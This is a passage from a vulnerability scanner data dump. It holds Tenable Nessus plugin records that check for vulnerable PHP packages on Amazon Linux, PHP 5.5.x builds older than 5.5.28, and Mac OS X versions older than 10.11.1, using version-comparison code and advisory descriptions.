(CVE-2016-9936)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-788.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php70' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-ldap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php70-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pdo-dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php70-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php70-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-bcmath-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-cli-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-common-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dba-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-dbg-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-debuginfo-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-devel-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-embedded-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-enchant-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-fpm-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gd-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-gmp-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php70-imap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-intl-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-json-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-ldap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mbstring-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mcrypt-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-mysqlnd-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-odbc-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-opcache-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pdo-dblib-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pgsql-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-process-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-pspell-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-recode-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-snmp-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-soap-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-tidy-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xml-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-xmlrpc-7.0.14-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php70-zip-7.0.14-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php70 / php70-bcmath / php70-cli / php70-common / php70-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:02:49", "description": "According to its banner, the version of PHP running on the remote web server is 5.5.x prior to 5.5.28. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple use-after-free errors exist in spl_array.c, spl_observer.c, and spl_dllist.c due to improper sanitization of input to the unserialize() function. An attacker can exploit these issues, by using a specially crafted SplDoublyLinkedList, SplArrayObject, or SplObjectStorage object, to dereference freed memory and thus execute arbitrary code. (CVE-2015-6831)\n\n - A dangling pointer error exists in file spl_array.c due to improper sanitization of input to the unserialize() function. An attacker can exploit this, by using a specially crafted SplDoublyLinkedList object, to gain control over a deallocated pointer and thus execute arbitrary code. (CVE-2015-6832)\n\n - A path traversal flaw exists in file phar_object.c due to improper sanitization of user-supplied input. An attacker can exploit this to write arbitrary files.\n (CVE-2015-6833)\n\n - A type confusion flaw exists in the serialize_function_call() function in soap.c due to improper validation of input passed via the header field. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-6836)\n\n - Multiple type confusion flaws exist in the _call() method in file php_http.c when handling calls for zend_hash_get_current_key or 'Z*'. An attacker can exploit this to disclose memory contents or crash an application using PHP. (CVE-2015-8835)\n\n - The openssl_random_pseudo_bytes() function in file openssl.c does not generate sufficiently random numbers.\n This allows an attacker to more easily predict the results, thus allowing further attacks to be carried out. 
(CVE-2015-8867)\n\n - A flaw exists in file zend_exceptions.c due to the improper use of the function unserialize() during recursive method calls. A remote attacker can exploit this to crash an application using PHP. (CVE-2015-8873)\n\n - A flaw exists in file zend_exceptions.c due to insufficient type checking by functions unserialize() and __toString(). A remote attacker can exploit this to cause a NULL pointer dereference or unexpected method execution, thus causing an application using PHP to crash. (CVE-2015-8876)\n\n - An integer truncation flaw exists in the zend_hash_compare() function in zend_hash.c that is triggered when comparing arrays. A remote attacker can exploit this to cause arrays to be improperly matched during comparison.\n Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-08-11T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.28 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8876"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_28.NASL", "href": "https://www.tenable.com/plugins/nessus/85299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85299);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-6836\",\n \"CVE-2015-8835\",\n \"CVE-2015-8867\",\n \"CVE-2015-8873\",\n \"CVE-2015-8876\"\n );\n script_xref(name:\"EDB-ID\", value:\"38304\");\n\n script_name(english:\"PHP 5.5.x < 5.5.28 
Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.5.x prior to 5.5.28. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple use-after-free errors exist in spl_array.c,\n spl_observer.c, and spl_dllist.c due to improper\n sanitization of input to the unserialize() function. An\n attacker can exploit these issues, by using a specially\n crafted SplDoublyLinkedList, SplArrayObject, or\n SplObjectStorage object, to deference freed memory and\n thus execute arbitrary code. (CVE-2015-6831)\n\n - A dangling pointer error exists in file spl_array.c due\n to improper sanitization of input to the unserialize()\n function. An attacker can exploit this, by using a\n specially crafted SplDoublyLinkedList object, to gain\n control over a deallocated pointer and thus execute\n arbitrary code. (CVE-2015-6832)\n\n - A path traversal flaw exists in file phar_object.c due\n to improper sanitization of user-supplied input. An\n attacker can exploit this to write arbitrary files.\n (CVE-2015-6833)\n\n - A type confusion flaw exists in the\n serialize_function_call() function in soap.c due to\n improper validation of input passed via the header\n field. A remote attacker can exploit this to execute\n arbitrary code. (CVE-2015-6836)\n\n - Multiple type confusion flaws exist in the _call()\n method in file php_http.c when handling calls for\n zend_hash_get_current_key or 'Z*'. An attacker can\n exploit this to disclose memory contents or crash\n an application using PHP. 
(CVE-2015-8835)\n\n - The openssl_random_pseudo_bytes() function in file\n openssl.c does not generate sufficiently random numbers.\n This allows an attacker to more easily predict the\n results, thus allowing further attacks to be carried\n out. (CVE-2015-8867)\n\n - A flaw exists in file zend_exceptions.c due to the\n improper use of the function unserialize() during\n recursive method calls. A remote attacker can exploit\n this to crash an application using PHP. (CVE-2015-8873)\n\n - A flaw exists in file zend_exceptions.c due to\n insufficient type checking by functions unserialize()\n and __toString(). A remote attacker can exploit this to\n cause a NULL pointer deference or unexpected method\n execution, thus causing an application using PHP to\n crash. (CVE-2015-8876)\n\n - An integer truncation flaw exists in the\n zend_hash_compare() function in zend_hash.c that is\n triggered when comparing arrays. A remote attacker can\n exploit this to cause arrays to be improperly matched\n during comparison.\n \nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/17\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/18\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2015/Aug/19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=69793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=70121\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8876\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[0-7])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.5.28' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:41:35", "description": "The remote host is running a version of Mac OS X version 10.11.x prior to 10.11.1 and is affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n - ATS (CVE-2015-6985)\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n - Bom (CVE-2015-7006)\n - CFNetwork (CVE-2015-7023)\n - configd (CVE-2015-7015)\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n - 
Directory Utility (CVE-2015-6980)\n - Disk Images (CVE-2015-6995)\n - EFI (CVE-2015-7035)\n - File Bookmark (CVE-2015-6987)\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n - Grand Central Dispatch (CVE-2015-6989)\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n - IOAcceleratorFamily (CVE-2015-6996)\n - IOHIDFamily (CVE-2015-6974)\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n - libarchive (CVE-2015-6984)\n - MCX Application Restrictions (CVE-2015-7016)\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n - OpenGL (CVE-2015-5924)\n - OpenSSH (CVE-2015-6563)\n - Sandbox (CVE-2015-5945)\n - Script Editor (CVE-2015-7007)\n - Security (CVE-2015-6983, CVE-2015-7024)\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-27T00:00:00", "type": "nessus", "title": "Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6563", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-0273", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-0235", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-6980", "CVE-2015-6996", "CVE-2015-6975", "CVE-2015-6992", "CVE-2015-7017", "CVE-2015-7006", "CVE-2015-7015", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5942", "CVE-2015-6989", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5939", "CVE-2015-6974", "CVE-2015-7019", "CVE-2015-7035", "CVE-2015-6995", "CVE-2015-7003", "CVE-2015-6985", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5944", "CVE-2015-6987", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-5938", 
"CVE-2015-5932", "CVE-2015-6984", "CVE-2015-7016", "CVE-2015-5945", "CVE-2015-7007", "CVE-2015-5943", "CVE-2015-7024", "CVE-2015-7010", "CVE-2015-5924", "CVE-2015-7009", "CVE-2015-5940", "CVE-2015-7023", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6993", "CVE-2015-7008", "CVE-2015-7018", "CVE-2015-6994", "CVE-2015-6988", "CVE-2015-6983"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "9324.PRM", "href": "https://www.tenable.com/plugins/nnm/9324", "sourceData": "Binary data 9324.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:33:16", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or later but prior to 10.11.1 It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, 
CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": null, "vector": null}, "published": "2015-10-29T00:00:00", "type": "nessus", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 
script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
